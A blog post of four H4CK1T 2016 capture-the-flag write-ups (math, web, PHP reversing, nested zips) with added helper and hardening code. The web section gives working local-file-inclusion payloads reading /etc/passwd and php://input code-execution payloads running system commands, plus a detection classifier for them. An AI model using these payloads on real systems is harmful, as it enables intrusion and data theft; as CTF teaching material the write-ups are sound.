[H4CK1T 2016] HellMath – Mongolia Writeup


Description:

HellMath – Mongolia – 100 – PPC – NEW

EN: Somebody thinks that you are able to calculate well. Is it true? Pass this task, prove the abilities and maybe we will recommend you to one of the most secret missions in this war.

# nc ctf.com.ua 9988 #

This one was a tricky question. Sometimes we overthink a problem so much that we forget the most basic facts.

Let’s begin. We are given a netcat command. Let’s run it and see what happens:

Megabeets: /tmp/h4ck1t/# nc ctf.com.ua 9988
Hello, stranger!
In this task you must solve 100 math questions.
Every task prints value C, where

C = A ^ B
and you need to return A and B.
Simple, isn't it?

C =  902688766290655704373689275053375955411443638316509920323848941975222889419457168696920458154297992623673837270038581569454814243805830583810239007096636651566143112784253577358992076929281284042240081518611899927486014041391480636127371844583712500925858241436577687881647483088199415935267570657867465207599620844695004309619118983781089160978919651087719815749856394166367766706778110070467678821838496167634418163901082752730509337302890389749997313424181834067339889277882795763685153563883836605864618300712713269080489519361527692457350059854544553090827217232806958474200121801180519077734723322730821821456307012680580248247037218481409333193782453105202353618778481032198022578852166518606909721942977575590954265237839696664727220865292977163448587698573864445402565395985502519681641780784380764161304054798829812233490916257278759562538568573426337720533085242758348167474155869479478584700074966635983754095730722241717146186660268605302301836193395575194171496181059843678720055443249024604241326634039569309251564445571858850712209536694524027635248909838940066204355066967778407959555544148932174508982884171285719680370353907943024211899094303816973257264835368157414233144693065775543775665646374894255716733398422962657186374363379853482641303616490385754787152837430574499189926206208167378653776600678668050752826349915972573133077173212387799225263508329369454811848100118727431542734051975488119495581578101088438806260901755298558179381970655381433179960687477909164284017317873303284836205753800005799794061481880410000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000

Well, we are given a number C and need to find numbers A and B such that A^B (power, not XOR) equals C.

At the beginning I tried to find algorithms online. “Such algorithms must exist!” I thought to myself. I found nothing and gave up for the day because it was late and I wanted to sleep. I was in my bed messaging a friend the question, and he simply answered:
– “Did you try 1?”
– “What 1?”
– “You know, every number to the power of 1 equals the number” (i.e. C = C^1)
– “OMG! It is so simple! You are the smartest person on earth!”


So I ran to my computer and wrote this short python script that gave me the flag:

from pwn import remote

r = remote('ctf.com.ua', 9988)

# The greeting ends with "Simple, isn't it?"; consume it and the rest of that line
print(r.recvuntil(b'?').decode())
print(r.recvline().decode())

for counter in range(100):
    q = r.recvline()                  # b"C =  9026...\n"
    while b'=' not in q:              # skip any blank line between questions
        q = r.recvline()
    c = q.split(b'=')[1].strip()      # keep only the digits of C
    print(q.decode().rstrip())
    print("\n----------\n")
    print(c.decode())

    # Every number is itself to the power of 1, so "C 1" is always a valid answer
    ans = c + b' 1'
    print(ans.decode())
    r.sendline(ans)

# After the 100th answer the server sends the flag
print(r.recv().decode())

# Flag: h4ck1t{R4ND0M_1S_MY_F4V0UR1T3_W34P0N}

Flag: h4ck1t{R4ND0M_1S_MY_F4V0UR1T3_W34P0N}
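As an added example (my own helper code, not the script from this post), here is a pure-Python take on the same problem: it parses the server's question line, produces the C^1 answer used above, and, going one step beyond the trick, finds the largest exponent B for which C is a perfect power A^B, using an exact integer k-th root on Python's big integers. The function names are my own, and the sample line in the usage block is constructed.

```python
import re


def parse_c(line):
    """Extract the integer C from a server line such as 'C =  9026...'."""
    m = re.fullmatch(r'\s*C\s*=\s*(\d+)\s*', line)
    if not m:
        raise ValueError(f'unexpected line: {line!r}')
    return int(m.group(1))


def trivial_answer(c):
    """The trick from the writeup: C is always C to the power of 1."""
    return c, 1


def iroot(n, k):
    """Largest integer r with r**k <= n, by binary search on big integers.
    The upper bound 2**(bitlen//k + 1) always exceeds the true k-th root."""
    lo, hi = 1, 1 << (n.bit_length() // k + 1)
    while lo < hi:
        mid = (lo + hi + 1) // 2
        if mid ** k <= n:
            lo = mid
        else:
            hi = mid - 1
    return lo


def largest_exponent(c):
    """Return (A, B) with A**B == C and B as large as possible (the perfect-power
    decomposition); falls back to (C, 1) when C is not a perfect power."""
    if c < 2:
        return c, 1
    # B can never exceed the bit length of C, so scan exponents downward
    for b in range(c.bit_length(), 1, -1):
        a = iroot(c, b)
        if a ** b == c:
            return a, b
    return c, 1


def reply(line):
    """What the solver sends back for one question line."""
    a, b = trivial_answer(parse_c(line))
    return f'{a} {b}'


if __name__ == '__main__':
    sample = 'C =  1267650600228229401496703205376\n'   # constructed: 2**100
    print(reply(sample))                                 # the "C 1" answer
    print(largest_exponent(parse_c(sample)))             # (2, 100)
```

`largest_exponent` is the "algorithm that must exist": perfect-power detection is cheap because the exponent is bounded by the bit length of C and each candidate needs only one integer root. For the challenge it is unnecessary, since the server accepts any valid pair.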


[H4CK1T 2016] Pentest – Mexico Writeup


Description:

Task: Remote pentest – Mexico – 150 – Web

Our foreign partners have some problems with qualified staff in the field of information technology, we decided to help them and to conduct remote testing of their new website. Your task is to find a hole in the system and grab some information to confirm the hack. Good luck!
http://91.231.84.36:9150/

YAY! Web challenge! If you follow my blog (if not, the subscribe form is on the left) you already know how much I love web challenges: they are either easy points or a great puzzle.

Let’s open the website and see what we have:

[image: h4ck1t_mexico1]

WOW! JUSTICE LEAGUE! Did I mention that I love comic books, and especially Batman? Oh, not yet?

Well, this challenge is going to be awesome. No. It’s already awesome!

OK, deep breath. Let’s start. See that menu at the bottom? Let’s click a link and see what happens.

[image: h4ck1t_mexico2]

Look at the URL: the “about” page is included by index.php using the PHP functions ‘require’ or ‘include’. When we see something like that in a challenge we can check whether the site is vulnerable to an LFI attack. In a Local File Inclusion attack we can include files from the local server. Let’s try to include /etc/passwd to check whether the vulnerability exists:

http://91.231.84.36:9150/index.php?page=../../../../etc/passwd

Didn’t work. Let’s try adding a null byte at the end:

http://91.231.84.36:9150/index.php?page=../../../../etc/passwd%00

[image: h4ck1t_mexico3]

It worked! We successfully got the /etc/passwd file. So what now? Let’s try to read the raw PHP source to see if the flag is in the PHP pages.

We can use the php://filter wrapper to output the content of index.php base64-encoded. We need the encoding because otherwise the PHP engine would execute the PHP parts of the file instead of showing them.

http://91.231.84.36:9150/index.php?page=php://filter/convert.base64-encode/resource=index

We got the encoded page; now let’s decode it and see if we find a flag. I deleted some content to reduce the size of the code in the post.

<?php
    if ($_GET["page"]) {
        $file = $_GET["page"].".php";
        // simulate null byte issue
        $file = preg_replace('/\x00.*/',"",$file);
        include($file);
    }
    else
    {
        echo '    <div class="container">
        <div class="row">
            <div class="col-md-6 col-sm-12">
                <h1>The Big Picture</h1>
                <p>Welcome to the Big Picture. This fantastic digital resource combines the best of formal and informal learning. 
If you are already using The Big Picture, you can register for and access exclusive extra material from this platform. 
This is The Big Picture: have you experienced it yet?  </p> 
            </div>
        </div>';
    }
    //flag{h@h@h@_man_n1ce_try} 

?>
<!DOCTYPE html>
<html class="full" lang="en">
<head>

...
...
...

    </div>
    <script src="js/jquery.js"></script>
    <script src="js/bootstrap.min.js"></script>

</body>

</html>


Nope. No flag. The “flag{…}” thing isn’t really the flag, because the flag in this CTF should be in h4ck1t{…} format.
Also the other pages, like ‘about’ and ‘contact’, do not contain any flag. So we probably need to escalate the LFI to RCE (Remote Code Execution). We can use the php://input wrapper to send PHP code through a POST request. Using the Firefox HackBar plugin we can do it easily.
Set the URL to http://91.231.84.36:9150/index.php?page=php://input and the POST data to:

<?  system('ls') ;?>

[image: h4ck1t_mexico4]

Success. We have RCE, and the listing reveals a new secret file. Let’s read it the same way, this time with:

<?  system('cat file') ;?>

And we got the flag 🙂

Flag: h4ck1t{g00d_rfi_its_y0ur_fl@g}
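The include logic shown above (append “.php”, strip everything after a NUL byte, include the result) is what let the three request shapes in this writeup through: the traversal with a trailing null byte, the php://filter wrapper and the php://input wrapper. The following is an added example, not code from the challenge or from this post, that models that logic in Python beside an allow-list version of the same lookup, plus a small classifier for those request shapes, the kind of check a web-log review or WAF rule applies. The set in ALLOWED_PAGES is assumed from the pages mentioned in this writeup, and the sample inputs are constructed (already URL-decoded, so %00 is a real NUL byte).

```python
import re

# Assumed set of pages the site ships; the only values 'page' may ever resolve to
ALLOWED_PAGES = {'index', 'about', 'contact'}


def resolve_page_vulnerable(page):
    """Model of the challenge's include logic: append '.php', then drop
    everything from the first NUL byte on (the 'simulated null byte issue').
    Returns the path that would be passed to include()."""
    file = page + '.php'
    return re.sub(r'\x00.*', '', file)


def resolve_page_hardened(page):
    """Allow-list lookup: the parameter is compared against known page names
    and never used to build a path; anything else is rejected with None."""
    if page not in ALLOWED_PAGES:
        return None
    return page + '.php'


def classify(page):
    """Label the request shapes seen in this writeup, for logging and alerting:
    NUL-byte truncation, directory traversal, and PHP stream wrappers."""
    reasons = []
    if '\x00' in page:
        reasons.append('null-byte')
    if '..' in page.replace('\\', '/').split('/'):
        reasons.append('traversal')
    if re.match(r'^[a-z][a-z0-9+.-]*://', page, re.I):
        reasons.append('wrapper')
    return reasons


# Constructed sample values of the 'page' parameter, after URL decoding
SAMPLES = [
    'about',
    '../../../../etc/passwd\x00',
    'php://filter/convert.base64-encode/resource=index',
    'php://input',
]

if __name__ == '__main__':
    for p in SAMPLES:
        print(repr(p))
        print('  vulnerable ->', repr(resolve_page_vulnerable(p)))
        print('  hardened   ->', repr(resolve_page_hardened(p)))
        print('  flags      ->', classify(p))
```

The point of the hardened variant is that the user-controlled value is only ever used as a dictionary key, so neither traversal, NUL bytes nor stream wrappers have anything to act on; the classifier exists because such requests are worth alerting on even when the application rejects them.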

[H4CK1T 2016] PhParanoid – Malaysia Writeup



Description:

Task: PhParanoid – Malaysia – 225 – Rever$e

EN: I am so paranoid! I try to hide everything from this mad world! I have already obfuscated my calculator sources, my javascript site sources and I’m not going to stop! And u will never know what I hide, haha!

In this challenge we got a phb file, i.e. a PHP file compiled with BCompiler (the PHP Bytecode Compiler). We can decompile it using this.

The decompilation process is very simple, and we easily got this PHP file (I deleted repeated parts to reduce its size):

<?php
$secret ="The";
do {
	$is_secret_exists = false;

	if (isset($secret)) {
		$is_secret_exists = true;
	}
	else {
		break;
	}

	$is_secret_valid = false;
	if (strstr($secret, "The") && (strpos($secret, "The") == 0)) {
		$is_secret_valid = true;
		echo $secret;
	}

	$c0 = chr(ord($secret[0]) + 20);

	if ((ord($c0) + (-20)) != 84) {
		unset($c0);
		break;
	}

	$c1 = chr(ord($secret[1]) + (-52));

	if ((ord($c1) + 52) != 104) {
		unset($c1);
		break;
	}
	
		...
		...
		...

	$c43 = chr(ord($secret[43]) + (-35));

	if ((ord($c43) + 35) != 103) {
		unset($c43);
		break;
	}

	$c44 = chr(ord($secret[44]) + 79);

	if ((ord($c44) + (-79)) != 46) {
		unset($c44);
		break;
	}
} while (false);

?>


So what we have here is a series of character-code manipulations that check whether the secret variable is valid. Let’s find out which character codes we need in order to recover the flag.

Every check in the code looks like the following. I added comments for explanation:

# the first character of the flag is the first character of the 'secret' + 20
$c0 = chr(ord($secret[0]) + 20);

# check if the char code of the first character of the flag -20 equals 84
if ((ord($c0) + (-20)) != 84) {
	unset($c0);
	break;
}

So from this we can deduce that the flag starts with chr(20+84), which is ‘h’. That makes sense, because we know the flag starts with “h4ck1t{”. I did some manipulation on the script (lots of replaces in Notepad++ to keep only the relevant char codes) to create a list of the char codes, and then converted them to characters with Python.

>>> charcodes = [+20 +84,-52 +104,-2 +101,-7 +114,-52 +101,+43 +73,+8 +115,+1 +78,-63 +111,+22 +82,-10 +105,-55 +103,+8 +104,-49 +116,-17 +65,-42 +110,-49 +100,-34 +87,-19 +114,-40 +111,-62 +110,+13 +103,+49 +46,-35 +84,-26 +104,-48 +101,-65 +114,-33 +101,-28 +79,-15 +110,-31 +108,-16 +121,+8 +70,-66 +117,-15 +110,-12 +65,-61 +110,-33 +100,+9 +66,-16 +111,-37 +114,-56 +105,+0 +110,-35 +103,+79 +46]
>>> flag = ''
>>>
>>> for c in charcodes:
...     flag+=chr(c)
...
>>> print(flag)
h4ck1t{O0h_0pC0D35_G0t_1N51D3_MiN3_51CK_M1nD}
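Rather than doing the replaces by hand in Notepad++, the shift and compare values can be pulled straight out of the decompiled source with two regular expressions. The following is an added example, not code from this post. SAMPLE is a constructed excerpt that contains only the checks for $c0 to $c3, $c43 and $c44, with the values from the list above, so positions the excerpt does not cover render as ‘?’. Besides the flag characters (compare value plus shift) it also recovers the expected characters of $secret (the compare values themselves), which is consistent with the strpos($secret, "The") check at the top of the script. The regexes are mine and match the formatting of the decompiled output as shown here.

```python
import re

# Constructed excerpt of the decompiled checks, with the writeup's values
SAMPLE = r'''
    $c0 = chr(ord($secret[0]) + 20);
    if ((ord($c0) + (-20)) != 84) { unset($c0); break; }
    $c1 = chr(ord($secret[1]) + (-52));
    if ((ord($c1) + 52) != 104) { unset($c1); break; }
    $c2 = chr(ord($secret[2]) + (-2));
    if ((ord($c2) + 2) != 101) { unset($c2); break; }
    $c3 = chr(ord($secret[3]) + (-7));
    if ((ord($c3) + 7) != 114) { unset($c3); break; }
    $c43 = chr(ord($secret[43]) + (-35));
    if ((ord($c43) + 35) != 103) { unset($c43); break; }
    $c44 = chr(ord($secret[44]) + 79);
    if ((ord($c44) + (-79)) != 46) { unset($c44); break; }
'''

# $cN = chr(ord($secret[N]) + SHIFT);      -> (N, N, SHIFT)
ASSIGN = re.compile(r'\$c(\d+)\s*=\s*chr\(ord\(\$secret\[(\d+)\]\)\s*\+\s*\(?(-?\d+)\)?\);')
# if ((ord($cN) + BACK) != EXPECTED)       -> (N, BACK, EXPECTED)
CHECK = re.compile(r'if\s*\(\(ord\(\$c(\d+)\)\s*\+\s*\(?(-?\d+)\)?\)\s*!=\s*(\d+)\)')


def parse_checks(php):
    """Return {index: (shift, expected)} for every check block found.
    Each assignment's shift must be undone by its check, which is verified."""
    shifts = {}
    for var, idx, shift in ASSIGN.findall(php):
        if var != idx:
            raise ValueError(f'$c{var} is built from $secret[{idx}]')
        shifts[int(var)] = int(shift)
    checks = {}
    for var, back, expected in CHECK.findall(php):
        n = int(var)
        if n not in shifts or int(back) != -shifts[n]:
            raise ValueError(f'inconsistent shift for $c{n}')
        checks[n] = (shifts[n], int(expected))
    return checks


def flag_chars(checks):
    """Flag character N is the shifted value: expected + shift."""
    return {n: chr(expected + shift) for n, (shift, expected) in checks.items()}


def secret_chars(checks):
    """The value the script expects in $secret[N] is the compare value itself."""
    return {n: chr(expected) for n, (shift, expected) in checks.items()}


def render(chars):
    """Lay the characters out by index, marking positions not in the excerpt."""
    return ''.join(chars.get(i, '?') for i in range(max(chars) + 1))


if __name__ == '__main__':
    checks = parse_checks(SAMPLE)
    print(render(flag_chars(checks)))    # h4ck???...??D}
    print(render(secret_chars(checks)))  # Ther???...??g.
```

Run against the full decompiled file instead of the excerpt, the same two regexes yield all 45 positions and the complete flag.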


[H4CK1T 2016] Hex0gator – Paraguay Writeup


Description:

EN: All Experts of The Silver Shield Project can’t decipher the intercepted data. Who knows, maybe you can do it?
100_00edb54bed7e46bd5cdb7c06059881c2


In this 250-point PPC challenge we got only one file. Let’s run the file command on it to determine its type:

Megabeets:/tmp/h4ckit/paraguay# file 100_00edb54bed7e46bd5cdb7c06059881c2
100_00edb54bed7e46bd5cdb7c06059881c2: Zip archive data, at least v2.0 to extract


This is a zip file containing a folder, and the folder contains a file named ‘99’. Let’s extract it and figure out its type:

Megabeets:/tmp/h4ckit/paraguay# file 99
99: Zip archive data, at least v1.0 to extract

99 is also a zip file, and inside it is another zip, and another zip… well, I see where this is going. I wrote a simple PowerShell script to extract all the archives using the ultimate archive manipulator, 7-Zip.

# Set $path to a folder containing only the file '99'
# ('99' lives in 'work_folder' inside the first archive)
$path = "C:\your\path"

while ($true)
{
    # the folder holds exactly one item at a time: the current layer
    $file = (Get-ChildItem $path)[0]
    if ($file.Name -eq 'flag')
    {
        # innermost layer reached: print the content of the file
        Get-Content $file.FullName
        break
    }
    else
    {
        # unpack this layer into $path (-o sets 7-Zip's output directory), then drop the archive itself
        & 'C:\Program Files\7-Zip\7z.exe' e $file.FullName "-o$path" -y > $null
        Remove-Item $file.FullName
    }
}

Now let’s run it:

PS C:\h4ckit\paraguay> C:\h4ckit\paraguay\solve.ps1
FLAG: 0W_MY_G0D_Y0U_M4D3_1T
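The PowerShell loop above writes every layer to disk and trusts whatever it finds. As an added example (my own code, not the script from this post), the same peeling can be done entirely in memory with Python's zipfile module, which also makes it easy to add the guards an analyst wants before opening an untrusted nested archive: a depth cap, a per-member size ceiling against zip bombs, and a rejection of absolute or “..” member names. The constants, the nesting depth used in the demonstration and the payload are assumed or constructed, not taken from the challenge file.

```python
import io
import zipfile

MAX_DEPTH = 200            # the challenge nests 100 layers; assumed cap against endless recursion
MAX_MEMBER_SIZE = 1 << 20  # assumed 1 MiB ceiling per layer, a cheap guard against zip bombs


def build_nested_zip(layers, innermost_name, payload):
    """Construct test data: `payload` stored as `innermost_name`, wrapped in
    `layers` zip files whose single members are named 0, 1, 2, ... outward."""
    data, name = payload, innermost_name
    for i in range(layers):
        buf = io.BytesIO()
        with zipfile.ZipFile(buf, 'w', zipfile.ZIP_DEFLATED) as zf:
            zf.writestr(name, data)
        data, name = buf.getvalue(), str(i)
    return data


def unwrap(data, name='<root>', max_depth=MAX_DEPTH):
    """Peel zip layers entirely in memory. Returns (depth, member_name, content)
    for the first layer that is not itself a zip file; nothing touches the disk,
    so a crafted member path cannot escape an extraction directory."""
    for depth in range(max_depth + 1):
        if not zipfile.is_zipfile(io.BytesIO(data)):
            return depth, name, data
        with zipfile.ZipFile(io.BytesIO(data)) as zf:
            members = [m for m in zf.infolist() if not m.is_dir()]
            if len(members) != 1:
                raise ValueError(f'layer {depth}: expected one file, found {len(members)}')
            member = members[0]
            parts = member.filename.replace('\\', '/').split('/')
            if member.filename.startswith('/') or '..' in parts:
                raise ValueError(f'layer {depth}: unsafe member name {member.filename!r}')
            if member.file_size > MAX_MEMBER_SIZE:
                raise ValueError(f'layer {depth}: member too large ({member.file_size} bytes)')
            # keep only the base name, so 'work_folder/99' becomes '99'
            data, name = zf.read(member), parts[-1]
    raise ValueError(f'more than {max_depth} nested layers, giving up')


if __name__ == '__main__':
    # Constructed sample: a 5-layer archive around a fake flag file
    sample = build_nested_zip(5, 'flag', b'FLAG: constructed_sample_value\n')
    print(unwrap(sample))
```

Because each layer is read with `zf.read` rather than extracted, the usual zip-slip concern does not arise, and the size check is evaluated on the declared `file_size` before any decompression happens.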